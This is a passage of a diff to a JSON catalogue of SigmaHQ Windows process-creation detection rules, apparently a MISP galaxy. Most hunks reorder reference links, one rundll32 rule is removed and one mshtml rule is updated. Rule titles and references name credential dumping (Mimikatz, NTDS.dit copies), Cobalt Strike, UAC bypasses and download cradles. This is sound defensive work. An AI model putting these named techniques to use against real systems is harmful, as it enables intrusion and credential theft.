"https://thedfirreport.com/2020/05/08/adfind-recon/", + "https://www.joeware.net/freetools/tools/adfind/", "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", "https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1087.002/T1087.002.md#atomic-test-7---adfind---enumerate-active-directory-user-objects", - "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_adfind_susp_usage.yml" ], "tags": [ @@ -61064,8 +61210,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/carlospolop/PEASS-ng", "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation", + "https://github.com/carlospolop/PEASS-ng", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_winpeas.yml" ], "tags": [ @@ -61114,8 +61260,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps", "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", + "https://docs.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_import_cert_susp_locations.yml" ], "tags": [ @@ -61148,8 +61294,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/subTee/status/1216465628946563073", "https://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26", + "https://twitter.com/subTee/status/1216465628946563073", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_task_folder_evasion.yml" ], "tags": [ @@ -61251,10 +61397,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks", - "https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing", "https://www.virustotal.com/gui/search/filename%253A*spoof*%2520filename%253A*ppid*/files", "https://pentestlab.blog/2020/02/24/parent-pid-spoofing/", + "https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing", + "https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_selectmyparent.yml" ], "tags": [ @@ -61323,8 +61469,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/", "https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bginfo_uncommon_child_process.yml" ], "tags": [ @@ -61407,9 +61553,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", - "https://twitter.com/MichalKoczwara/status/1553634816016498688", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task", + "https://twitter.com/MichalKoczwara/status/1553634816016498688", + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_disable.yml" ], "tags": [ @@ -61509,8 +61655,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0", "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57", + "https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_com_cradles.yml" ], "tags": [ @@ -61543,8 +61689,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/af1c82237b6e5a3a7cdbad82cc498d298c67845d92971bada450023d1335e267/content", "https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell", + "https://www.virustotal.com/gui/file/af1c82237b6e5a3a7cdbad82cc498d298c67845d92971bada450023d1335e267/content", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_add_windows_capability.yml" ], "tags": [ @@ -61568,8 +61714,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html", "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", + "https://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml" ], "tags": [ @@ -61636,8 +61782,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html", "https://learn.microsoft.com/en-us/windows-server/administration/server-core/server-core-sconfig#powershell-is-the-default-shell-on-server-core", + "https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_userinit_uncommon_child_processes.yml" ], "tags": [ @@ -61670,10 +61816,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://app.any.run/tasks/93fe92fa-8b2b-4d92-8c09-a841aed2e793/", "https://docs.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support", "https://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7", "https://app.any.run/tasks/214094a7-0abc-4a7b-a564-1b757faed79d/", - "https://app.any.run/tasks/93fe92fa-8b2b-4d92-8c09-a841aed2e793/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_16bit_application.yml" ], "tags": [ @@ -61798,8 +61944,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/", "https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml" ], @@ -61945,9 +62091,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/", "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf", + "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml" ], "tags": [ @@ -62013,9 +62159,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html", - "https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/", "https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16", + "https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/", + "https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_exec_susp_locations.yml" ], "tags": [ @@ -62060,9 +62206,9 @@ "value": "Potentially Suspicious Windows App Activity" }, { - "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", + "description": "Detects execution of commands that leverage the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...)\n", "meta": { - "author": "Nasreddine Bencherchali (Nextron Systems)", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems), Josh Nickels, frack113, Zaw Min Htun (ZETA)", "creation_date": "2022/08/14", "falsepositive": [ "Unlikely" @@ -62072,15 +62218,18 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt", "https://twitter.com/n1nj4sec/status/1421190238081277959", + "https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_mshtml_runhtmlapplication.yml" ], "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.execution" ] }, "uuid": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", - "value": "Mshtml DLL RunHTMLApplication Abuse" + "value": "Mshtml.DLL RunHTMLApplication Suspicious Usage" }, { "description": "Detects command line containing reference to the \"::$index_allocation\" stream, which can be used as a technique to prevent access to folders or files from tooling such as \"explorer.exe\" or \"powershell.exe\"\n", @@ -62095,11 +62244,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://sec-consult.com/blog/detail/pentesters-windows-ntfs-tricks-collection/", - "https://github.com/redcanaryco/atomic-red-team/blob/5c3b23002d2bbede3c07e7307165fc2a235a427d/atomics/T1564.004/T1564.004.md#atomic-test-5---create-hidden-directory-via-index_allocation", "https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/", - "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/c54dec26-1551-4d3a-a0ea-4fa40f848eb3", "https://twitter.com/pfiatde/status/1681977680688738305", + "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/c54dec26-1551-4d3a-a0ea-4fa40f848eb3", + "https://github.com/redcanaryco/atomic-red-team/blob/5c3b23002d2bbede3c07e7307165fc2a235a427d/atomics/T1564.004/T1564.004.md#atomic-test-5---create-hidden-directory-via-index_allocation", + "https://sec-consult.com/blog/detail/pentesters-windows-ntfs-tricks-collection/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_hidden_dir_index_allocation.yml" ], "tags": [ @@ -62274,12 +62423,12 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", - "https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/", "https://forensicitguy.github.io/agenttesla-vba-certutil-download/", "https://twitter.com/egre55/status/1087685529016193025", - "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", "https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/", + "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", + "https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains.yml" ], "tags": [ @@ -62312,8 +62461,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://tools.thehacker.recipes/mimikatz/modules", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://tools.thehacker.recipes/mimikatz/modules", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_mimikatz_command_line.yml" ], "tags": [ @@ -62548,9 +62697,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate", "https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a", + "https://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_export_certificate.yml" ], "tags": [ @@ -62592,9 +62741,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-3---create-windows-system-file-with-attrib", "https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/attrib", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-3---create-windows-system-file-with-attrib", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system.yml" ], "tags": [ @@ -62662,8 +62811,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "Internal Research", "https://github.com/pr0xylife/Pikabot/blob/main/Pikabot_22.12.2023.txt", + "Internal Research", "https://github.com/pr0xylife/Pikabot/blob/main/Pikabot_30.10.2023.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wscript_cscript_susp_child_processes.yml" ], @@ -62687,8 +62836,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/", "https://guides.lib.umich.edu/c.php?g=282942&p=1885348", + "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/", "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_susp_extensions.yml" ], @@ -62709,40 +62858,6 @@ "uuid": "089fc3d2-71e8-4763-a8a5-c97fbb0a403e", "value": "Regsvr32 DLL Execution With Suspicious File Extension" }, - { - "description": "Detects suspicious process related to rundll32 based on arguments", - "meta": { - "author": "frack113, Zaw Min Htun (ZETA)", - "creation_date": "2021/12/04", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "filename": "proc_creation_win_rundll32_script_run.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52", - "https://github.com/redcanaryco/atomic-red-team/blob/cd3690b100a495885c407282d0c94c85f48a8a2e/atomics/T1218.011/T1218.011.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_script_run.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ] - }, - "related": [ - { - "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - } - ], - "uuid": "73fcad2e-ff14-4c38-b11d-4172c8ac86c7", - "value": "Suspicious Rundll32 Script in CommandLine" - }, { "description": "Detects the usage of \"hh.exe\" to execute/download remotely hosted \".chm\" files.", "meta": { @@ -62756,9 +62871,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37", "https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md", "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html", - "https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm_remote_download_or_execution.yml" ], "tags": [ @@ -62867,11 +62982,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html", "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", + "https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html", "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://twitter.com/cglyer/status/1355171195654709249", - "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_uninstall_security_products.yml" ], "tags": [ @@ -62905,8 +63020,8 @@ "logsource.product": "windows", "refs": [ "https://eqllib.readthedocs.io/en/latest/analytics/ab7a6ef4-0983-4275-a4f1-5c6bd3c31c23.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md", "https://github.com/frgnca/AudioDeviceCmdlets", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_audio_capture.yml" ], "tags": [ @@ -62939,8 +63054,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_computer_discovery_get_adcomputer.yml" ], @@ -63009,9 +63124,9 @@ "logsource.product": "windows", "refs": [ "https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/", + "https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return", "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://nodejs.org/api/cli.html", - "https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_node_abuse.yml" ], "tags": [ @@ -63045,8 +63160,8 @@ "logsource.product": "windows", "refs": [ "https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b", - "https://github.com/hfiref0x/UACME", "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", + "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml" ], "tags": [ @@ -63113,8 +63228,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware", "https://docs.microsoft.com/fr-fr/windows-server/administration/windows-commands/fsutil-behavior", + "https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml" ], "tags": [ @@ -63353,12 +63468,12 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/", - "https://lolbas-project.github.io/lolbas/Binaries/Teams/", "https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf", - "https://taggart-tech.com/quasar-electron/", + "https://lolbas-project.github.io/lolbas/Binaries/Teams/", "https://github.com/mttaggart/quasar", + "https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/", "https://lolbas-project.github.io/lolbas/Binaries/Msedge/", + "https://taggart-tech.com/quasar-electron/", "https://positive.security/blog/ms-officecmd-rce", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_electron_app_children.yml" ], @@ -63458,9 +63573,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/", - "http://www.xuetr.com/", "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/", + "http://www.xuetr.com/", + "https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_pchunter.yml" ], "tags": [ @@ -63609,8 +63724,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20200903194959/https://twitter.com/djmtshepana/status/1301608169496612866", "https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/", + "https://web.archive.org/web/20200903194959/https://twitter.com/djmtshepana/status/1301608169496612866", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mpcmdrun_download_arbitrary_file.yml" ], "tags": [ @@ -63787,8 +63902,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_susp_paths.yml" ], @@ -64005,8 +64120,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", "https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/", + "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_process_patterns.yml" ], "tags": [ @@ -64039,9 +64154,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/", - "https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/", "https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html", + "https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/", + "https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_driverquery_usage.yml" ], "tags": [ @@ -64065,9 +64180,9 @@ "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Rdrleakdiag/", - "https://www.pureid.io/dumping-abusing-windows-credentials-part-1/", "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", "https://twitter.com/0gtweet/status/1299071304805560321?s=21", + "https://www.pureid.io/dumping-abusing-windows-credentials-part-1/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml" ], "tags": [ @@ -64100,10 +64215,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://isc.sans.edu/diary/22264", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", - "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", - "https://isc.sans.edu/diary/22264", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_direct_ip.yml" ], "tags": [ @@ -64169,9 +64284,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.echotrail.io/insights/search/mshta.exe", "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", "https://en.wikipedia.org/wiki/HTML_Application", - "https://www.echotrail.io/insights/search/mshta.exe", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml" ], "tags": [ @@ -64204,10 +64319,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/4abe1395a09fda06d897a9c4eb247278c1b6cddda5d126ce5b3f4f499e3b8fa2/behavior", - "https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior", "https://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior", "https://www.virustotal.com/gui/file/34de4c8beded481a4084a1fd77855c3e977e8ac643e5c5842d0f15f7f9b9086f/behavior", + "https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior", + "https://www.virustotal.com/gui/file/4abe1395a09fda06d897a9c4eb247278c1b6cddda5d126ce5b3f4f499e3b8fa2/behavior", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml" ], "tags": [ @@ -64242,11 +64357,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", - "https://twitter.com/gN3mes1s/status/1206874118282448897", "https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/", - "https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1027.004/T1027.004.md#atomic-test-1---compile-after-delivery-using-cscexe", + "https://twitter.com/gN3mes1s/status/1206874118282448897", + "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", "https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/", + "https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1027.004/T1027.004.md#atomic-test-1---compile-after-delivery-using-cscexe", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_csc_susp_dynamic_compilation.yml" ], "tags": [ @@ -64279,8 +64394,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml" ], "tags": [ @@ -64355,9 +64470,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.nirsoft.net/utils/nircmd.html", - "https://www.nirsoft.net/utils/nircmd2.html#using", "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://www.nirsoft.net/utils/nircmd2.html#using", + "https://www.nirsoft.net/utils/nircmd.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nircmd_as_system.yml" ], "tags": [ @@ -64614,8 +64729,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/", "https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dnx.yml" ], "tags": [ @@ -64747,8 +64862,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/", "https://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html", + "https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/", 